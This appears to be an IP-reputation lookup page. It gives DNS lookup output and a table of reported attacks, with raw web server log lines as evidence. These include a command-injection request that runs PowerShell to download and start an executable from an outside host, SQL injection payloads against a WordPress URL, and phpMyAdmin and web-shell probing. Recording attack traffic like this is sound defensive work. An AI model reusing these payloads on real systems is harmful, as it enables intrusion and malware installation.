城市(city): unknown
省份(region): unknown
国家(country): United States
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 107.80.121.56
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 21804
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;107.80.121.56. IN A
;; AUTHORITY SECTION:
. 600 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2022022800 1800 900 604800 86400
;; Query time: 63 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Mon Feb 28 15:10:08 CST 2022
;; MSG SIZE rcvd: 10656.121.80.107.in-addr.arpa domain name pointer mobile-107-80-121-56.mycingular.net.Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
56.121.80.107.in-addr.arpa name = mobile-107-80-121-56.mycingular.net.
Authoritative answers can be found from:| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 27.115.124.6 | botsattack | 假百度refer 27.115.124.6 - - [18/Apr/2019:16:33:13 +0800] "GET /server-status HTTP/1.1" 403 3918 "http://www.baidu.com" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0" |
2019-04-18 16:36:00 |
| 118.25.71.65 | attack | 118.25.71.65 - - [19/Apr/2019:15:56:16 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 301 194 "http://118.25.52.138:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.71.65 - - [19/Apr/2019:15:56:16 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 404 232 "http://118.25.52.138:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-19 15:56:51 |
| 14.17.3.64 | attack | 14.17.3.64 - - [13/Apr/2019:08:08:33 +0800] "GET /phpmyadmin/index.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 14.17.3.65 - - [13/Apr/2019:08:08:33 +0800] "GET /license.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 14.17.3.64 - - [13/Apr/2019:08:08:33 +0800] "GET /uploader.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 14.17.3.64 - - [13/Apr/2019:08:08:33 +0800] "GET /phpmyadmin/index.php HTTP/1.1" 404 209 "http://118.25.52.138/phpmyadmin/index.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 14.17.3.65 - - [13/Apr/2019:08:08:33 +0800] "GET /license.php HTTP/1.1" 404 209 "http://118.25.52.138/license.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 14.17.3.64 - - [13/Apr/2019:08:08:33 +0800] "GET /uploader.php HTTP/1.1" 404 209 "http://118.25.52.138/uploader.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-13 08:17:33 |
| 172.245.184.232 | attack | 172.245.184.232 - - [16/Apr/2019:16:17:39 +0800] "GET /Public/Wchat/js/cvphp.js HTTP/1.1" 404 481 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)" |
2019-04-16 16:19:38 |
| 116.7.22.4 | bots | 116.7.22.4 - - [19/Apr/2019:21:44:40 +0800] "GET /index.php/category/root/ HTTP/1.1" 200 74293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 116.7.22.4 - - [19/Apr/2019:21:44:46 +0800] "GET /index.php/category/root/airbnb/ HTTP/1.1" 200 76208 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 116.7.22.4 - - [19/Apr/2019:21:44:54 +0800] "GET /index.php/category/root/amd/ HTTP/1.1" 200 105403 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 116.7.22.4 - - [19/Apr/2019:21:45:09 +0800] "GET /index.php/category/root/instacart/ HTTP/1.1" 200 54716 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 116.7.22.4 - - [19/Apr/2019:21:45:18 +0800] "GET /index.php/category/root/lyft/ HTTP/1.1" 200 75675 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" |
2019-04-19 21:48:14 |
| 5.188.44.47 | spam | 5.188.44.47 - - [19/Apr/2019:13:11:26 +0800] "GET /index.php/2018/08/29/jack_ma_2018_08_29_en/ HTTP/1.1" 200 13881 "https://eznewstoday.com/index.php/2018/08/29/jack_ma_2018_08_29_en/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.88 Safari/537.36" 5.188.44.47 - - [19/Apr/2019:13:11:27 +0800] "GET /index.php/2018/08/29/jack_ma_2018_08_29_en/ HTTP/1.1" 200 13881 "https://eznewstoday.com/index.php/2018/08/29/jack_ma_2018_08_29_en/" "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17" 5.188.44.47 - - [19/Apr/2019:13:11:28 +0800] "GET /index.php/2018/08/29/jack_ma_2018_08_29_en/ HTTP/1.1" 200 13881 "https://eznewstoday.com/index.php/2018/08/29/jack_ma_2018_08_29_en/" "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17" |
2019-04-19 14:01:19 |
| 176.121.14.179 | attack | 176.121.14.179 - - [12/Apr/2019:18:51:46 +0800] "GET /wp-includes/js/jquery/jquery.js?ver=%28SELECT%20%28CASE%20WHEN%20%286045%3D3065%29%20THEN%206045%20ELSE%206045%2A%28SELECT%206045%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 HTTP/1.1" 200 37676 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" 176.121.14.179 - - [12/Apr/2019:18:51:46 +0800] "GET /wp-includes/js/jquery/jquery.js?ver=%28SELECT%20%28CASE%20WHEN%20%281221%3D1221%29%20THEN%201221%20ELSE%201221%2A%28SELECT%201221%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 HTTP/1.1" 200 37676 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" 176.121.14.179 - - [12/Apr/2019:18:51:46 +0800] "GET /wp-includes/js/jquery/jquery.js?ver=1.12.4%29%20AND%20%28SELECT%204391%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x716a717871%2C%28SELECT%20%28ELT%284391%3D4391%2C1%29%29%29%2C0x7178717671%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%287476%3D7476 HTTP/1.1" 200 37676 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" 176.121.14.179 - - [12/Apr/2019:18:51:46 +0800] "GET /wp-includes/js/jquery/jquery.js?ver=1.12.4%20AND%20%28SELECT%204391%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x716a717871%2C%28SELECT%20%28ELT%284391%3D4391%2C1%29%29%29%2C0x7178717671%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 HTTP/1.1" 200 37676 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" |
2019-04-12 18:57:10 |
| 159.203.169.16 | bots | 端口扫描工具 159.203.169.16 - - [20/Apr/2019:04:41:30 +0800] "GET / HTTP/1.0" 200 24600 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" |
2019-04-20 05:08:16 |
| 123.206.22.203 | attack | 123.206.22.203 - - [19/Apr/2019:13:57:02 +0800] "GET /d7.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 123.206.22.203 - - [19/Apr/2019:13:57:02 +0800] "GET /rxr.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 123.206.22.203 - - [19/Apr/2019:13:57:02 +0800] "GET /1x.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 123.206.22.203 - - [19/Apr/2019:13:57:02 +0800] "GET /home.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 123.206.22.203 - - [19/Apr/2019:13:57:02 +0800] "GET /undx.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 123.206.22.203 - - [19/Apr/2019:13:57:02 +0800] "GET /spider.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" |
2019-04-19 14:00:22 |
| 205.205.150.9 | bots | 205.205.150.9 - - [17/Apr/2019:06:19:22 +0800] "GET / HTTP/1.1" 200 212220 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" |
2019-04-17 08:05:47 |
| 50.63.197.101 | attack | wordpress检测攻击 50.63.197.101 - - [18/Apr/2019:14:15:48 +0800] "GET /wordpress/wp-admin/ HTTP/1.1" 301 194 "-" "-" |
2019-04-18 14:17:06 |
| 178.62.232.43 | botsattack | 178.62.232.43 - - [18/Apr/2019:08:32:24 +0800] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 178.62.232.43 - - [18/Apr/2019:08:32:24 +0800] "GET /pma/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 178.62.232.43 - - [18/Apr/2019:08:32:24 +0800] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 178.62.232.43 - - [18/Apr/2019:08:32:24 +0800] "GET /phpmy/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 178.62.232.43 - - [18/Apr/2019:08:32:24 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 301 194 "-" "ZmEu" |
2019-04-18 08:35:01 |
| 68.183.123.123 | attack | 68.183.123.123 - - [15/Apr/2019:09:53:42 +0800] "GET /sql/myadmin/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" 68.183.123.123 - - [15/Apr/2019:09:53:43 +0800] "GET /sql/webadmin/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" 68.183.123.123 - - [15/Apr/2019:09:53:43 +0800] "GET /sql/sqlweb/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" 68.183.123.123 - - [15/Apr/2019:09:53:44 +0800] "GET /sql/websql/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" 68.183.123.123 - - [15/Apr/2019:09:53:44 +0800] "GET /sql/webdb/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36" |
2019-04-15 10:18:04 |
| 5.188.115.64 | attack | 端口扫描brute-force |
2019-04-16 07:05:55 |
| 54.242.155.91 | attack | 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /myadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /pma/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 301 194 "-" "ZmEu" 54.242.155.91 - - [14/Apr/2019:19:26:59 +0800] "GET HTTP/1.1" 400 182 "-" "-" |
2019-04-14 19:37:25 |